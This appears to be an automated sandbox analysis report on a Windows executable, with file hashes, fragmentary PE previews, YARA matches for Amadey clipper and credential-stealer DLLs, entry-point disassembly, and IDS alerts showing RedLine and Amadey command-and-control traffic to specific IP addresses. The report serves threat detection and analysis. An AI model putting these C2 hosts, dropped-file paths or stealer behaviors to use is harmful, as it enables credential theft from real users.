                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):441344
                                                                                                                                                                Entropy (8bit):6.488128856014368
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
                                                                                                                                                                MD5:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                SHA1:549964178B12017622D3CBDDA6DBFDEF0904E7E2
                                                                                                                                                                SHA-256:EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
                                                                                                                                                                SHA-512:911A59F7A6785DD09A57DCD6D977B8ABD5E160BD613786E871A1E92377C9E6F3B85FE3037431754BBDB1212E153776EFCA5FADAC1DE6B2AD474253DA176E8E53
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....Zg..........................................@..........................0............@..................................F...................................E......8...........................8...@...............<............................text...z........................... ..`.rdata...I.......J..................@..@.data....m...`...,...H..............@....rsrc................t..............@..@.reloc...E.......F...v..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\yINR7uQlPr.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):308224
                                                                                                                                                                Entropy (8bit):6.27479026130529
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
                                                                                                                                                                MD5:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                SHA1:B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
                                                                                                                                                                SHA-256:2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
                                                                                                                                                                SHA-512:0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\yINR7uQlPr.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):26
                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                Entropy (8bit):6.36076412023942
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
                                                                                                                                                                MD5:C2F3FBBBE6D5F48A71B6B168B1485866
                                                                                                                                                                SHA1:1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
                                                                                                                                                                SHA-256:C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                                                                                                                                                                SHA-512:E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Author: Joe Security
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1281024
                                                                                                                                                                Entropy (8bit):6.466046469058072
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
                                                                                                                                                                MD5:C6AABB27450F1A9939A417E86BF53217
                                                                                                                                                                SHA1:B8EF3BB7575139FD6997379415D7119E452B5FC4
                                                                                                                                                                SHA-256:B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                                                                                                                                                                SHA-512:E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Author: Joe Security
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):290
                                                                                                                                                                Entropy (8bit):3.4289930081624274
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:mw3xX55ZsUEZ+lX1VsLlw3btFXqYEp5t/uy0lZtsEt0:9uQ1VsLlw37fXVZtNt0
                                                                                                                                                                MD5:DBEBCB5F6362A94E964E71D1779A609A
                                                                                                                                                                SHA1:7C2DB8E81E6868B16B5491F36BE6983DA660111D
                                                                                                                                                                SHA-256:30F8501B22BF6B27817C6B2E36C374DB9A0E76404BD3A01EA9DB242F6EDF66E2
                                                                                                                                                                SHA-512:58C600AA6985391520145E8CA41959C120E959A8F6E13E05F9656B8B4499B365DD165B6E5C5E93DBE97CA8CB3C2114566483B049BC73778DEE6845BD31DA0C41
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.....$.T~]M..^..)..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.e.2.9.e.a.5.0.8.b.\.G.x.t.u.u.m...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................
                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Entropy (8bit):6.283898970170584
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:yINR7uQlPr.exe
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5:1bbc3bff13812c25d47cd84bca3da2dc
                                                                                                                                                                SHA1:d3406bf8d0e9ac246c272fa284a35a3560bdbff5
                                                                                                                                                                SHA256:0a17e2ca8f223de67c0864fac1d24c7bb2d0c796c46e9ce04e4dff374c577ea1
                                                                                                                                                                SHA512:181b1e2bd08978b6ee3da2b48e0b113623b85c42ab8cec2a23bd5119aba7105fdeef9b7b00343d37b0c8344494640ce0a51615393def8242334420134f75871f
                                                                                                                                                                SSDEEP:6144:O2JKCwoXjMvjfTK/zNTdEpZ4m1qpxXQKQrUJ0tYRVAOTIdTsImm:8CwoXjMbTKLNhEpZ4m0vXQKQrxgu
                                                                                                                                                                TLSH:7B644B27308162CFF798B273D01499B4D4FEE8B552B64AA5A120F6F7171B2C34F14EA6
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d....SXg.........."......:...*......\4.....
                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                Entrypoint:0x14000345c
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x675853D5 [Tue Dec 10 14:44:37 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:5
                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                File Version Major:5
                                                                                                                                                                File Version Minor:2
                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                Import Hash:f48301e47b2e40bf9641ab1156532a80
                                                                                                                                                                Instruction
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 00000278h
                                                                                                                                                                call 00007F6A9D014A7Dh
                                                                                                                                                                call 00007F6A9D016BF4h
                                                                                                                                                                movzx eax, al
                                                                                                                                                                test eax, eax
                                                                                                                                                                je 00007F6A9D016E4Ah
                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                call dword ptr [00003F0Ch]
                                                                                                                                                                call 00007F6A9D017C28h
                                                                                                                                                                mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                mov edx, dword ptr [esp+30h]
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                call 00007F6A9D017692h
                                                                                                                                                                dec eax
                                                                                                                                                                lea edx, dword ptr [00002FF2h]
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                call 00007F6A9D0178B1h
                                                                                                                                                                test eax, eax
                                                                                                                                                                je 00007F6A9D016E91h
                                                                                                                                                                dec eax
                                                                                                                                                                mov ecx, dword ptr [00003B85h]
                                                                                                                                                                call 00007F6A9D017D31h
                                                                                                                                                                movzx eax, al
                                                                                                                                                                test eax, eax
                                                                                                                                                                jne 00007F6A9D016E55h
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [00002FE2h]
                                                                                                                                                                call 00007F6A9D017D1Eh
                                                                                                                                                                movzx eax, al
                                                                                                                                                                test eax, eax
                                                                                                                                                                je 00007F6A9D016E4Ah
                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                call dword ptr [00003CE6h]
                                                                                                                                                                call 00007F6A9D016C52h
                                                                                                                                                                xor eax, eax
                                                                                                                                                                cmp eax, 01h
                                                                                                                                                                je 00007F6A9D016E4Fh
                                                                                                                                                                mov ecx, 0000C350h
                                                                                                                                                                call dword ptr [00003C7Fh]
                                                                                                                                                                jmp 00007F6A9D016E2Eh
                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                call dword ptr [00003CC5h]
                                                                                                                                                                dec eax
                                                                                                                                                                lea edx, dword ptr [00002FB6h]
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                call 00007F6A9D01784Dh
                                                                                                                                                                test eax, eax
                                                                                                                                                                je 00007F6A9D016E7Eh
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [00002FB9h]
                                                                                                                                                                call 00007F6A9D017CCDh
                                                                                                                                                                movzx eax, al
                                                                                                                                                                test eax, eax
                                                                                                                                                                je 00007F6A9D016E4Ah
                                                                                                                                                                Programming Language:
                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                • [C++] VS2010 build 30319
                                                                                                                                                                • [RES] VS2010 build 30319
                                                                                                                                                                • [LNK] VS2010 build 30319
                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x68400x28.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x328.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x80000x240.pdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x50000x20.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x39cb0x3a00a8859d1f9b0c91e6fb1eb31e0fba6d60False0.4165544181034483zlib compressed data5.545864849703848IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x50000x18c80x1a0054f0fa7b25bcbaa76c26039919fc716bFalse0.29041466346153844OpenPGP Public Key4.185103722160237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x70000x6880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .pdata0x80000x2400x400c0d1e6294ad4138cca9188a27b6b84e5False0.345703125data2.5822176110941975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0x90000x3280x4000d7214eb073287b0cc1ef48e92bf4fcbFalse0.361328125data2.6200573070054105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .x640xa0000x460000x452005d9520d19d3dfa4f5a275bd011d96ad0False0.46218071880650996data6.108634375053754IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_VERSION0x90600x2c4dataEnglishUnited States0.4717514124293785
                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllLoadLibraryA, GetVersionExW, GetProcAddress
                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States
                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-12-13T01:37:06.461578+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549707185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:17.775120+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549711185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:22.874431+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549726185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:26.656312+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:26.656312+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:27.096738+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.549738TCP
                                                                                                                                                                2024-12-13T01:37:30.835138+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549752185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:30.873651+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549753185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:32.149745+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:33.161554+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:33.281672+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.549738TCP
                                                                                                                                                                2024-12-13T01:37:33.618848+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:33.820737+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549761185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:34.850542+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:35.288592+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:35.765758+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:36.069997+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.549769185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:36.156479+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.549770185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:36.213761+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:36.421957+01002044597ET MALWARE Amadey Bot Activity (POST) M11192.168.2.549775185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:36.578919+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549772185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:37:36.859262+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:37.364802+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:37.541008+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.549780185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:37.541008+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.549780185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:37.687904+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.549781185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:37.687904+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.549781185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:38.264018+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:39.039789+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:39.159660+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:39.825443+01002044597ET MALWARE Amadey Bot Activity (POST) M11192.168.2.549792185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:39.825443+01002856149ETPRO MALWARE Amadey CnC Activity M51192.168.2.549792185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:40.305964+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549791185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:40.683961+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.549793185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:40.750025+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:41.037322+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.549794185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:41.311807+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:41.758939+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:42.214100+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:42.925495+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:43.439327+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:43.879129+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:44.353023+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:44.754750+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:45.254752+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:45.633409+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:46.070832+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:46.558826+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549738185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:37:46.805970+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549813185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:47.205200+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549816185.81.68.14780TCP
